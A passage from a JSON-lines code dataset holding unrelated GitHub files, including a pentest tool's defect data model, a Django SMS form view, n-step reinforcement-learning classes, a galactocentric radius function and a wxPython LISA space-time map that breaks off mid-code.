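# A pure-function sketch of that layout (all argument values are placeholders):
def calc_dir_path(pentest, ip, defect_id, port=None, proto=None):
    path = "{}/{}".format(pentest, ip)
    if port:  # port-level defects get an extra path segment
        path += "/{}_{}".format(port, proto)
    return "{}/{}".format(path, defect_id)

assert calc_dir_path('demo', '10.0.0.5', 'abc123') == 'demo/10.0.0.5/abc123'
assert calc_dir_path('demo', '10.0.0.5', 'abc123', port='443', proto='tcp') == 'demo/10.0.0.5/443_tcp/abc123'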
If assigned, it will be prepended with ip and (udp/)port\n \"\"\"\n ret = \"\"\n if self.ip is not None:\n if self.ip != \"\":\n ret += str(self.ip)\n if self.proto is not None and self.port is not None:\n if self.port != \"\":\n if self.proto != \"tcp\":\n ret += \":\"+self.proto+\"/\"+self.port\n else:\n ret += \":\"+self.port\n ret += \" \"+self.__str__()\n return ret\n\n def getDbKey(self):\n \"\"\"Return a dict from model to use as unique composed key.\n Returns:\n A dict (4 keys :\"ip\", \"port\", \"proto\", \"title\")\n \"\"\"\n return {\"ip\": self.ip, \"port\": self.port, \"proto\": self.proto, \"title\": self.title}\n\n def isAssigned(self):\n \"\"\"Returns a boolean indicating if this defect is assigned to an ip or is global.\n Returns:\n bool\n \"\"\"\n return self.ip != \"\"\n\n @classmethod\n def getDefectTable(cls):\n \"\"\"Return the table of global defects sorted by their index field\n Returns:\n A list of Defect\n \"\"\"\n return APIClient.getInstance().getDefectTable()\n \n","repo_name":"fbarre96/PollenisatorCLI","sub_path":"pollenisatorcli/core/Models/Defect.py","file_name":"Defect.py","file_ext":"py","file_size_in_byte":10451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21829557617","text":"#!/usr/bin/python -O\n#\n# A small program to simulate results from an experiment with an exponential distribution.\n#\n# - Make sure you understand the code below\n# - Complete the evaluation_metric method so that it returns the mean\n# - What do you expect the results to be?\n# ----- I expect the result to be somewhere between 50% and 100%. Ideally it should be\n# ----- around 90%.\n# - \"Run\" the experiment. What's surprising.\n# ----- The results fall into the ballpark of 75%-79%, which is kind of surprising. The\n# ----- better_dist is 50% higher than individuals after all!\n# - Change the metric to something that more often selects the \"winning\" distribution.\n# ----- My new metric removes the top 2 from list to avoid cases where 1024 or 512 gets picked\n# ----- and skews the result. 
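# The comments in this file reason about why a trimmed mean beats a plain
# mean on this heavy-tailed distribution. A standalone restatement of the
# idea (the original evaluation_metric below mutates its input with
# remove(max) twice; sorting and slicing off the top `trim` samples is an
# equivalent way to compute the same average):
def trimmed_mean(counts, trim=2):
    # Drop the `trim` largest samples, then average what remains.
    kept = sorted(counts)[:-trim] if trim else list(counts)
    return sum(kept) / float(len(kept))

assert trimmed_mean([1, 2, 4, 512, 1024]) == (1 + 2 + 4) / 3.0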
Now I win rate is about 93-95%.\n#\n\nimport math\nimport random\n\n\n# Consider this the \"true\" population distribution of number of ratings\nworse_dist = (\n [1024] * 1 +\n [512] * 2 +\n [256] * 4 +\n [128] * 8 +\n [64] * 16 +\n [32] * 32 +\n [16] * 64 +\n [8] * 128 +\n [4] * 256 +\n [2] * 512 +\n [1] * 1024\n\n)\n\n# better dist is 50% bigger than worse\nbetter_dist = [x * 1.5 for x in worse_dist]\n\n# Number of experiments to be simulated\nnum_experiments = 1000\n\n# Number of subjects per experiment \nnum_subjects = 100\n\ndef evaluation_metric(contribution_counts):\n \"\"\"\n Given contributions counts (a list of floats)\n Returns a single float that is an evaluation metric.\n The float should captures the aggregate amount of work.\n \"\"\"\n contribution_counts.remove(max(contribution_counts))\n contribution_counts.remove(max(contribution_counts))\n return sum(contribution_counts)/len(contribution_counts)\n\n# make sure you understand this code.\nnum_better_wins = 0\nfor i in range(num_experiments):\n l = random.sample(worse_dist, num_subjects / 2)\n b = random.sample(better_dist, num_subjects / 2)\n if evaluation_metric(b) > evaluation_metric(l):\n num_better_wins += 1\n\nprint('better distribution won %.1f%% of the time' % (100.0 * num_better_wins / num_experiments))\n","repo_name":"yulunli/COMP432","sub_path":"src/h0/unbalanced_experiments.py","file_name":"unbalanced_experiments.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3430102702","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.views.generic import TemplateView\nfrom .forms import ZayavkaForm\nfrom .models import sms_send\n\n\n#class IndexPageView(TemplateView):\n# template_name = \"index.html\"\n# context_object_name = 'index'\n\n# zayavka_view(request)\n # def get_context_data(self, **kwargs):\n # context = super(HomePageView, self).get_context_data(**kwargs)\n # context['latest_articles'] = Article.objects.all()[:5]\n # return context\n\n\ndef index_view(request):\n args = {}\n\n if request.method == 'POST':\n zayavka_form = ZayavkaForm(request.POST)\n\n if zayavka_form.is_valid():\n phone_number = zayavka_form.cleaned_data['phone_number']\n zayavka_text = zayavka_form.cleaned_data['zayavka_text']\n zayavka_name = zayavka_form.cleaned_data['zayavka_name']\n zayavka_msg = \"zayavka ot %s %s %s\" % (phone_number, zayavka_name, zayavka_text)\n sms_request = sms_send(zayavka_msg)\n args['sms_request'] = sms_request\n\n else:\n zayavka_msg = 'Не правильно заполнена форма!!'\n\n\n else:\n zayavka_form = ZayavkaForm()\n zayavka_msg = \"Введите данные!\"\n\n args['zayavka_form'] = zayavka_form\n args['title'] = 'BismIllah:'\n args['sms_text'] = zayavka_msg\n\n return render(request, 'index.html', args)\n","repo_name":"jagger909/bergruz","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9387809875","text":"from django.shortcuts import render\nfrom .models import Image_uploader\nfrom .froms import Image_form\n# Create your views here.\ndef image_iplaoder(request):\n if request.method==\"POST\":\n fm=Image_form(request.POST,request.FILES)\n if fm.is_valid():\n fm.save()\n fm=Image_form()\n img=Image_uploader.objects.all()\n return render 
(request,'enroll/home.html',{'form':fm,'fm':img})","repo_name":"rafeeq13/django-projects","sub_path":"image_uplaoder/enroll/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18384950566","text":"import numpy as np\nfrom numpy.linalg import svd\nimport scipy\n\n\ndef pcNet(X, nComp = 3, scale = True, symmetric = False, q = 0): # X: cell * gene, q: 0-100\n X = scipy.sparse.csr_matrix.toarray(X) if scipy.sparse.issparse(X) else X\n if not isinstance(X, np.ndarray):\n raise ValueError('Input should be a numpy array with cells as rows and genes as columns')\n elif nComp < 2 or nComp >= X.shape[1]:\n raise ValueError('nComp should be greater or equal than 2 and lower than the total number of genes')\n \n else:\n n = X.shape[1] # genes\n def pcCoefficients(K):\n y = X[:, K] \n Xi = np.delete(X, K, 1)\n U, s, VT = svd(Xi, full_matrices=False) \n #print ('U:', U.shape, 's:', s.shape, 'VT:', VT.shape)\n V = VT[:nComp, :].T\n #print('V:', V.shape)\n\n score = Xi@V\n t = np.sqrt(np.sum(score**2, axis=0))\n score_lsq = ((score.T / (t**2)[:, None])).T\n beta = np.sum(y[:, None]*score_lsq, axis=0)\n beta = V@beta\n\n return list(beta)\n \n B = []\n for k in range(n):\n B.append(pcCoefficients(k))\n B = np.array(B)\n \n A = np.ones((n, n), dtype=float)\n np.fill_diagonal(A, 0)\n for i in range(n):\n A[i, A[i, :]==1] = B[i, :]\n \n if scale:\n absA = abs(A)\n A = A / np.max(absA)\n if q > 0:\n A[absA < np.percentile(absA, q)] = 0\n if symmetric: # place in the end\n A = (A + A.T)/2\n #diag(A) <- 0\n \n return A\n \n \n","repo_name":"qwerty239qwe/Xct","sub_path":"pcNet.py","file_name":"pcNet.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34505265324","text":"import os\nfrom tqdm import tqdm\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom paired_dataset import PairedDataset\nfrom logger import Logger, Visualizer\nimport imageio\nimport numpy as np\n\nfrom sync_batchnorm import DataParallelWithCallback\nfrom normalize_kp import normalize_kp\n\ndef animate(config, generator, kp_detector, checkpoint, log_dir, dataset):\n log_dir = os.path.join(log_dir, 'animation')\n png_dir = os.path.join(log_dir, 'png')\n animate_params = config['animate_params']\n\n dataset = PairedDataset(initial_dataset=dataset, number_of_pairs=animate_params['num_pairs'])\n dataloader = DataLoader(dataset, batch_size=1, shuffle=False, num_workers=1)\n\n if checkpoint is not None:\n Logger.load_cpk(checkpoint, generator=generator, kp_detector=kp_detector)\n else:\n raise AttributeError(\"Checkpoint should be specified for mode='animate'.\")\n\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n\n if not os.path.exists(png_dir):\n os.makedirs(png_dir)\n\n if torch.cuda.is_available():\n generator = DataParallelWithCallback(generator)\n kp_detector = DataParallelWithCallback(kp_detector)\n\n generator.eval()\n kp_detector.eval()\n\n for it, x in tqdm(enumerate(dataloader)):\n with torch.no_grad():\n predictions = []\n visualizations = []\n\n driving_video = x['driving_video']\n source_frame = x['source_video'][:, :, 0, :, :]\n\n kp_source = kp_detector(source_frame)\n kp_driving_initial = kp_detector(driving_video[:, :, 0])\n\n for frame_idx in range(driving_video.shape[2]):\n driving_frame = driving_video[:, :, frame_idx]\n kp_driving = kp_detector(driving_frame)\n kp_norm = 
normalize_kp(kp_source=kp_source, kp_driving=kp_driving,\n kp_driving_initial=kp_driving_initial, **animate_params['normalization_params'])\n out = generator(source_frame, kp_source=kp_source, kp_driving=kp_norm)\n\n out['kp_driving'] = kp_driving\n out['kp_source'] = kp_source\n out['kp_norm'] = kp_norm\n\n del out['sparse_deformed']\n\n predictions.append(np.transpose(out['prediction'].data.cpu().numpy(), [0, 2, 3, 1])[0])\n\n visualization = Visualizer(**config['visualizer_params']).visualize(source=source_frame,\n driving=driving_frame, out=out)\n visualization = visualization\n visualizations.append(visualization)\n\n predictions = np.concatenate(predictions, axis=1)\n result_name = \"-\".join([x['driving_name'][0], x['source_name'][0]])\n imageio.imsave(os.path.join(png_dir, result_name + '.png'), (255 * predictions).astype(np.uint8))\n\n image_name = result_name + animate_params['format']\n imageio.mimsave(os.path.join(log_dir, image_name), visualizations)\n","repo_name":"Adjective-Object/first-order-motion-tk","sub_path":"animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21293903200","text":"import numpy as np\n\ndef galactocentric(gal_ra, gal_dec, incl, pa, sn_ra, sn_dec):\n \"\"\"\n Calculate deprojected radii and projected angles in a disk. \n\n Parameters\n ----------\n gal_ra : float\n ra coord of the galactic center in degrees\n gal_dec : float\n dec coord of the galactic center in degrees\n incl : float\n galaxy inclination angle in degrees\n pa : float\n galaxy position angle in degrees\n sn_ra : float\n ra coord of the supernova in degrees\n sn_dec : float\n dec coord of the supernova in degrees\n \n Returns\n -------\n radius_deg : float\n galactocentric radius in degrees\n radius_arcsec : float\n galactocentric radius in arcseconds\n proj_ang : float\n projection angle in degrees (theta in (r,theta))\n \"\"\"\n\n # recast the ra and dec arrays in term of the center coordinates\n # arrays are now in degrees from the center\n # offsets in ra and dec on celestial sphere (might misbehave at poles)\n dx_deg = (sn_ra - gal_ra) * np.cos(np.deg2rad(gal_dec))\n dy_deg = sn_dec - gal_dec\n\n # rotation angle (rotate x-axis up to the major axis)\n rotangle = np.pi/2.0 - np.deg2rad(pa)\n\n # create deprojected coordinate grids\n # offsets after deprojection with the coordinates we are interested in\n deprojdx_deg = (dx_deg * np.cos(rotangle) +\n dy_deg * np.sin(rotangle))\n deprojdy_deg = (dy_deg * np.cos(rotangle) -\n dx_deg * np.sin(rotangle))\n deprojdy_deg /= np.cos(np.deg2rad(incl))\n\n # make map of deprojected distance from the center\n radius_deg = np.sqrt(deprojdx_deg**2 + deprojdy_deg**2)\n radius_arcsec = radius_deg * 3600\n \n # make map of angle w.r.t. 
position angle\n projang_deg = np.rad2deg(np.arctan2(deprojdy_deg, deprojdx_deg))\n\n return radius_deg, radius_arcsec, projang_deg\n","repo_name":"NessMayker/PythonFunctions","sub_path":"galactocentricRadius.py","file_name":"galactocentricRadius.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8463418364","text":"# Standard Libraries\nimport sys\nimport itertools\nfrom pathlib import Path\n\n# Third party libraries\nimport pandas as pd\nimport numpy as np\nfrom icecream import ic\n\n# Local imports\nfrom ..logs import logging\nfrom .tool_box import RLFunctions\n\nclass NStepFunctions(RLFunctions):\n \"\"\"\n \"\"\"\n def __init__(self) -> None:\n RLFunctions.__init__(self)\n self.logger = logging.getLogger(__name__)\n self.action_methods = {\n 'random': self.get_random_action, \n 'greedy': self.greedy}\n\n def compute_trajectory(self, action_method:str='random'):\n '''Create the past S, R from starting state to the terminal state'''\n # Get the starting state and first action of new epoch\n state = self.starting_state\n action = self.action_methods[action_method](state)\n states, actions, rewards, next_states, next_actions = [], [], [], [], []\n while not self.env.is_terminal_state(state): \n next_state = self.env.next_state_given_action(state, action)\n reward = self.env.grid[self.env.next_state_given_action(state, action)] - 1\n states.append(state)\n actions.append(action)\n rewards.append(reward)\n\n state = next_state\n action = self.action_methods[action_method](state)\n next_states.append(state)\n next_actions.append(action) \n return pd.DataFrame({\n 'state': states, 'action': actions, 'reward': rewards,\n 'next_state': next_states, 'next_action': next_actions}, \n index=range(1, len(states)+1))\n\n def compute_td_nstep_returns(self, df:pd.DataFrame):\n '''Compute the n-step returns from the trajectory'''\n horizon = self.n_step if self.n_step < df.shape[0] else df.shape[0]\n discounts = np.logspace(0, horizon+1, num=horizon+1, base=self.gamma, endpoint=False)[-horizon:]\n # Gt = []\n for index in reversed(df.index):\n nstep_df = df.loc[index+1:index+horizon, : ]\n G = np.sum(nstep_df.reward * discounts[:len(nstep_df.reward)])\n if index + self.n_step < df.shape[0]:\n G += self.gamma * self.env.grid[df.loc[index + self.n_step].state]\n\n # Update state value\n self.env.grid[df.loc[index].state] +=\\\n self.alpha * (G - self.env.grid[df.loc[index].state])\n return df\n\n def compute_sarsa_nstep_returns(self, df:pd.DataFrame, Q:np.array):\n '''Compute the n-step returns from the trajectory'''\n horizon = self.n_step if self.n_step < df.shape[0] else df.shape[0]\n discounts = np.logspace(0, horizon+1, num=horizon+1, base=self.gamma, endpoint=False)[-horizon:]\n\n for index in reversed(df.index):\n nstep_df = df.loc[index+1:index+horizon, : ]\n G = np.sum(nstep_df.reward * discounts[:len(nstep_df.reward)])\n if index + self.n_step < df.shape[0]:\n G += self.gamma *\\\n Q[self.env.all_states.index(df.loc[index + self.n_step, 'state'])][self.env.possible_actions.index(df.loc[index + self.n_step, 'action'])]\n\n # Update state value\n Q[self.env.all_states.index(df.loc[index, 'state'])][self.env.possible_actions.index(df.loc[index, 'action'])] +=\\\n self.alpha *\\\n (G - Q[self.env.all_states.index(df.loc[index, 'state'])][self.env.possible_actions.index(df.loc[index, 'action'])])\n return Q\n\n def compute_n_step_returns(self, df:pd.DataFrame, Q:np.array, E:np.array):\n '''Compute 
the n-step returns from the trajectory'''\n # Taken by https://github.com/mimoralea/gdrl/blob/master/notebooks/chapter_06/chapter-06.ipynb\n # but my implementation my be wrong\n for index in reversed(df.index):\n td_target = df.loc[index, 'reward'] + self.gamma *\\\n Q[self.env.all_states.index(df.loc[index, 'next_state'])][self.env.possible_actions.index(df.loc[index, 'next_action'])]\n td_error = td_target -\\\n Q[self.env.all_states.index(df.loc[index, 'state'])][self.env.possible_actions.index(df.loc[index, 'action'])]\n\n E[self.env.all_states.index(df.loc[index, 'state'])][self.env.possible_actions.index(df.loc[index, 'action'])] =\\\n E[self.env.all_states.index(df.loc[index, 'state'])][self.env.possible_actions.index(df.loc[index, 'action'])] + 1\n \n Q = Q + self.alpha * td_error * E\n return Q\n\nclass NStepTD(NStepFunctions):\n '''\n n-step TD for estimating vi=vi*\n Reference:\n --------------------\n - Reinforcement Learning: An Introduction. Sutton and Barto. 2nd Edition. Page 144.\n '''\n def __init__(\n self, env, alpha:float = 0.5, gamma:float = 0.9, starting_state:tuple=None,\n num_of_epochs:int = 1_000, n_step = 1):\n \"\"\"\n Initializes the grid world\n - env: grid_environment: A tabular environment created by Make class\n - gamma: discount_factor, float: discount factor\n - num_of_epochs: int: number of epochs \n \"\"\"\n NStepFunctions.__init__(self)\n self.env = env\n self.alpha = alpha\n self.n_step = n_step\n self.gamma = gamma\n self.num_of_epochs = num_of_epochs\n self.starting_state = env.initial_state if starting_state is None else starting_state\n\n def compute_state_value(self):\n for epoch in range(self.num_of_epochs):\n if epoch % 100 == 0:\n self.logger.info(f'Epoch {epoch}')\n self.env.render_state_value()\n\n ## 1. Create Path\n trajectory_df = self.compute_trajectory()\n\n ## 2. Compute return\n self.compute_td_nstep_returns(trajectory_df)\n\n\nclass NStepSARSA(NStepFunctions):\n '''\n n-step Sarsa for estimating Q==q* or q_{pi}\n Reference:\n --------------------\n - Reinforcement Learning: An Introduction. Sutton and Barto. 2nd Edition. Page 147.\n '''\n def __init__(\n self, env, alpha:float = 0.5, gamma:float = 0.9, starting_state:tuple=None,\n epsilon:float=.1, num_of_epochs:int = 1_000, n_step = 1):\n \"\"\"\n - env: grid_environment: A tabular environment created by Make class\n - gamma: discount_factor, float: discount factor\n - num_of_epochs: int: number of epochs \n \"\"\"\n NStepFunctions.__init__(self)\n self.env = env\n self.alpha = alpha\n self.n_step = n_step\n self.epsilon = epsilon\n self.gamma = gamma\n self.num_of_epochs = num_of_epochs\n self.starting_state = env.initial_state if starting_state is None else starting_state\n\n def compute_state_value(self):\n Q = np.zeros((len(self.env.all_states), len(self.env.possible_actions)), dtype=np.float64)\n E = np.zeros((len(self.env.all_states), len(self.env.possible_actions)), dtype=np.float64)\n for epoch in range(self.num_of_epochs):\n if epoch % 100 == 0:\n self.logger.info(f'Epoch {epoch}')\n self.env.render_state_value()\n\n E.fill(0)\n ## 1. Create Path\n trajectory_df = self.compute_trajectory(action_method='greedy')\n\n ## 2. 
Compute Q\n # Q = self.compute_n_step_returns(trajectory_df, Q, E)\n Q = self.compute_sarsa_nstep_returns(trajectory_df, Q)\n\n final_q = pd.DataFrame(\n data=Q,\n index=self.env.all_states,\n columns=self.env.possible_actions)\n \n self.drew_policy(final_q, plot_name='sarsa')\n \n\nclass NStepOffPolicySARSA(NStepFunctions):\n '''\n Reference:\n --------------------\n - Reinforcement Learning: An Introduction. Sutton and Barto. 2nd Edition. Page 149.\n '''\n pass\n\nclass NStepTreeBackup(NStepFunctions):\n '''\n Reference:\n --------------------\n - Reinforcement Learning: An Introduction. Sutton and Barto. 2nd Edition. Page 155.\n '''\n pass\n\nclass OffPolicyNStepQSigma(NStepFunctions):\n '''\n Reference:\n --------------------\n - Reinforcement Learning: An Introduction. Sutton and Barto. 2nd Edition. Page 156.\n '''\n pass","repo_name":"MattiaCinelli/AlgoRL","sub_path":"algorl/src/Nstep.py","file_name":"Nstep.py","file_ext":"py","file_size_in_byte":8210,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"34873803393","text":"def getDayName(date, month, year):\n months = {'jan': 0, 'feb': 3, 'mar': 3, 'apr': 6, 'may': 1, 'jun': 4, 'jul': 6, 'aug': 2,\n 'sep': 5, 'oct': 0, 'nov': 3, 'dec': 5}\n\n days = {0: 'sunday', 1: 'monday', 2: 'tuesday', 3: 'wednesday', 4: 'thursday', 5: 'friday', 6: 'saturday'}\n\n sum = date + months[month] + (year - 1900) + ((year - 1900) // 4)\n\n return days[sum % 7]\n\n\nif __name__ == \"__main__\":\n date, month, year = input(\"Enter a date of month of a year(ex: 22 apr 1996):\\n\").split(\" \")\n date, month, year = int(date), str(month).lower(), int(year)\n print(getDayName(date, month, year).capitalize())\n\n","repo_name":"tohfaakib/Fun-With-Python","sub_path":"findingDayNameOfAnyDateOfAnyYear.py","file_name":"findingDayNameOfAnyDateOfAnyYear.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40971713282","text":"import pymysql, re, time\nfrom threading import Thread\nfrom colorama import init, Fore, Back, Style\nfrom urllib.parse import quote, unquote\nfrom sys import exit\nfrom urllib.parse import quote\n\nclass Database(object):\n def __init__(self, user, password, database):\n try:\n init()\n self.db = pymysql.connect (\n host=\"127.0.0.1\",\n port=3306,\n user=user,\n password=password,\n db=database\n )\n self.cursor = self.db.cursor()\n except Exception as e:\n print(Fore.RED + \"INDEX error 0x1:\")\n print(e)\n print(Style.RESET_ALL)\n exit()\n\n def getData(self, numberOfLinks=10):\n self.cursor.execute(\"SELECT ID, indexed FROM queue WHERE url like '%:%' AND visited>-1 LIMIT \" + str(numberOfLinks) + \";\")\n result = self.cursor.fetchall()\n for row in result:\n self.execute(\"UPDATE queue SET visited=-1 WHERE ID=\"+str(row[0])+\";\")\n return result\n\n def execute(self, command):\n try:\n self.cursor.execute(command)\n self.db.commit()\n return True\n except Exception as e:\n print('MySQL executing error', str(e))\n return False\n\n def close(self):\n self.cursor.close()\n self.db.close()\n","repo_name":"jappe999/WebScraper","sub_path":"reduce_db/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"17704106271","text":"__author__ = \"Xun Li \"\n__all__ = [\"LISASpaceTimeMap\", \"LISASpaceTimeQueryDialog\", \"ShowLISASpaceTimeMap\"]\n\nimport 
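# --- Illustrative aside (not part of the records above): the table-based weekday formula
# in getDayName can be cross-checked against the standard library; this assumes Gregorian
# dates from 1900 on, matching the (year - 1900) terms in that formula.
import datetime

def day_name_stdlib(day, month_num, year):
    # date.strftime('%A') yields the full weekday name directly
    return datetime.date(year, month_num, day).strftime("%A").lower()

print(day_name_stdlib(22, 4, 1996))   # -> 'monday'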
os,math, datetime\nimport wx\nimport numpy as np\nimport pysal\n\nimport stars\nfrom ShapeMap import *\nfrom DynamicLisaMap import DynamicLISAMap, DynamicLISAQueryDialog\nfrom stars.visualization.DynamicControl import DynamicMapControl\nfrom stars.visualization.DynamicWidget import DynamicMapWidget\nfrom stars.visualization.PlotWidget import PlottingCanvas\nfrom stars.visualization import PlotWidget, AbstractData\nfrom stars.visualization.utils import View2ScreenTransform, GetDateTimeIntervals, FilterShapeList\nfrom stars.visualization.plots.LISATrendGraph import LISATrendGraph\nfrom stars.visualization.dialogs import TimeWeightsDlg\n\nclass LISASpaceTimeMap(ShapeMap):\n \"\"\"\n \"\"\"\n def __init__(self, parent, layers, **kwargs):\n ShapeMap.__init__(self,parent, layers)\n \n try:\n self.weight_file = kwargs[\"weight\"]\n self.cs_data_dict = kwargs[\"query_data\"]\n self.bufferWidth, self.bufferHeight = kwargs[\"size\"]\n self.step, self.step_by = kwargs[\"step\"] ,kwargs[\"step_by\"]\n self.start_date, self.end_date = kwargs[\"start\"],kwargs[\"end\"]\n \n self.nav_left = None\n self.nav_right = None\n self.bStrip = True\n \n # preprocessing parameters \n self.parent = parent\n self.layer = layers[0]\n self.data_sel_keys = sorted(self.cs_data_dict.keys())\n self.data_sel_values = [self.cs_data_dict[i] for i in self.data_sel_keys]\n self.weight = pysal.open(self.weight_file).read()\n self.t = len(self.cs_data_dict) # number of data slices\n self.n = len(self.data_sel_values[0]) # number of shape objects\n \n self.extent = self.layer.extent\n self.view = View2ScreenTransform(\n self.extent, \n self.bufferWidth, \n self.bufferHeight - self.bufferHeight/3.0\n ) \n \n self.datetime_intervals, self.interval_labels = GetDateTimeIntervals(self.start_date, self.end_date,self.t, self.step, self.step_by)\n self.setupDynamicControls()\n self.parentFrame.SetTitle('LISA Space Time Map-%s' % self.layer.name)\n self.dynamic_control = DynamicMapControl(self.parentFrame,self.t+1,self.updateDraw)\n \n self.trendgraphWidget = None\n self.popupTrendGraph = None\n \n # preprocessing LISA SpaceTime maps\n self.processLISASpaceTimeMap()\n \n except Exception as err:\n self.ShowMsgBox(\"\"\"LISA Space Time map could not be created. 
Please check or create new spatial and/or time weights files.\"\"\")\n self.UnRegister()\n self.parentFrame.Close(True)\n if os.name == 'nt':\n self.Destroy()\n return None\n \n def OnClose(self, event):\n self.UnRegister()\n if self.trendgraphWidget:\n self.trendgraphWidget.Close(True)\n if self.popupTrendGraph:\n self.popupTrendGraph.Close(True)\n event.Skip()\n \n def setupDynamicControls(self):\n \"\"\"\n assign labels of dynamic controls\n \"\"\"\n self.parentWidget = self.parent.GetParent()\n self.slider = self.parentWidget.animate_slider\n if isinstance(self.start_date, datetime.date):\n self.parentWidget.label_start.SetLabel('%2d/%2d/%4d'% (self.start_date.day,self.start_date.month,self.start_date.year))\n self.parentWidget.label_end.SetLabel('%2d/%2d/%4d'% (self.end_date.day,self.end_date.month,self.end_date.year))\n else:\n self.parentWidget.label_start.SetLabel('%d'% self.start_date)\n self.parentWidget.label_end.SetLabel('%4d'% self.end_date)\n self.parentWidget.label_current.SetLabel('current: %d (%d-%s period)' % (1,self.step, self.step_by))\n \n def processLISASpaceTimeMap(self):\n from stars.core.LISAWrapper import call_lisa\n \n # promote for time weights\n tw_dlg = TimeWeightsDlg(self.main, self.t, self.layer.name)\n tw_path = tw_dlg.Show()\n if tw_path == False:\n raise Exception(\"no time weights\")\n \n timeWeights = pysal.open(tw_path).read()\n self.timeNeighbors = timeWeights.neighbors\n \n # time LISA\n self.tseries_data = {}\n for pid in range(self.n):\n tseries = []\n for tid in range(self.t):\n tseries.append(self.cs_data_dict[tid][pid])\n self.tseries_data[pid] = tseries\n \n self.time_moran_locals = {}\n for pid in range(self.n):\n tseries = self.tseries_data[pid]\n localMoran, sigLocalMoran, sigFlag, clusterFlag = call_lisa(tseries,str(tw_path),499)\n ml = [localMoran, sigLocalMoran, sigFlag, clusterFlag]\n self.time_moran_locals[pid] = ml\n \n # show LISA trend graph\n trendgraphWidget = PlotWidget(\n self, \n self.layer, \n [self.tseries_data,self.time_moran_locals, self.timeNeighbors,[]],\n LISATrendGraph, \n pos = (self.parentFrame.Position[0] + self.parentFrame.Size[0], self.parentFrame.Position[1]),\n title=\"Trend Graph Plot for Time LISA (%s): %s\"%(self.t, self.layer.name)\n )\n trendgraphWidget.Show()\n self.trendgraphWidget = trendgraphWidget\n\n # space LISA\n self.space_moran_locals = dict()\n for tid,data in self.cs_data_dict.iteritems():\n localMoran, sigLocalMoran, sigFlag, clusterFlag = call_lisa(data,str(self.weight_file),499)\n ml = [localMoran, sigLocalMoran, sigFlag, clusterFlag]\n self.space_moran_locals[tid] = ml\n \n # default color schema for LISA\n self.lisa_color_group =[\n stars.LISA_NOT_SIG_COLOR, \n stars.LISA_HH_COLOR,\n stars.LISA_LL_COLOR, \n stars.LISA_LH_COLOR,\n stars.LISA_HL_COLOR, \n stars.LISA_OBSOLETE_COLOR\n ]\n label_group = [\"Not Significant\",\"High-High\",\"Low-Low\",\"Low-High\",\"High-Low\",\"Neighborless\"]\n self.color_schema_dict[self.layer.name] = ColorSchema(self.lisa_color_group,label_group)\n \n self.internalLISA = False\n \n # inital drawing markov lisa map\n self.updateDraw(0)\n \n # Thread-based controller for dynamic LISA\n self.dynamic_control = DynamicMapControl(self.parentFrame,self.t,self.updateDraw) \n \n def draw_selected_by_ids(self, shape_ids_dict, dc=None):\n super(LISASpaceTimeMap, self).draw_selected_by_ids(shape_ids_dict,dc)\n \n self.selected_shape_ids = shape_ids_dict\n if self.internalLISA:\n self.draw_popup(dc)\n \r\n def draw_selected_by_region(self,dc, region, \n isEvtResponse=False, 
\n isScreenCoordinates=False):\n if self.internalLISA:\n self.draw_popup(dc, region)\n \n super(LISASpaceTimeMap, self).draw_selected_by_region(\n dc, region, isEvtResponse, isScreenCoordinates)\n \n def showInternalPopupTimeLISA(self, event):\n self.internalLISA = not self.internalLISA\n \n if self.internalLISA == False:\n if self.popupTrendGraph != None:\n self.popupTrendGraph.Close(True)\n self.popupTrendGraph = None\n \n def showExtPopupTimeLISA(self, event):\n self.internalLISA = False\n \n # show LISA trend graph\n if self.trendgraphWidget == None or isinstance(self.trendgraphWidget, wx._core._wxPyDeadObject):\n self.trendgraphWidget = PlotWidget(\n self, \n self.layer, \n [self.tseries_data,self.time_moran_locals, self.timeNeighbors,[]],\n LISATrendGraph, \n pos = (self.parentFrame.Position[0] + self.parentFrame.Size[0], self.parentFrame.Position[1]),\n title=\"Trend Graph Plot for Time Gi*(%s): %s\"%(self.t, self.layer.name)\n )\n self.trendgraphWidget.Show()\n self.trendgraphWidget.SetFocus()\n \n def draw_popup(self, dc, region=None):\n if self.popupTrendGraph != None:\n self.popupTrendGraph.Close(True)\n self.popupTrendGraph = None\n \n if len(self.selected_shape_ids) == 0:\n return\n \n selected_ids = []\n if self.layer.name in self.selected_shape_ids:\n selected_ids = self.selected_shape_ids[self.layer.name]\n \n trendgraph_data = dict()\n for i in range(self.n):\n data = []\n for j in range(self.t):\n data.append(self.cs_data_dict[j][i])\n trendgraph_data[i] = data\n \n self.popupTrendGraph= LISATrendGraph(\n self.parent, \n self.layer,\n [self.tseries_data,self.time_moran_locals, self.timeNeighbors,selected_ids]\n )\n self.popupTrendGraph.Hide()\n \n if region:\n x,y = region[2],region[3]\n else:\n x,y = self.layer.centroids[selected_ids[0]][0]\n x,y = self.view.view_to_pixel(x,y)\n x,y = int(x),int(y)\n w = int(math.ceil(self.bufferWidth * 0.5))\n if w < 300: \n w = 300\n if w > 450: \n w = 450\n h = w * 0.7\n if x + w > self.bufferWidth: \n if x - w 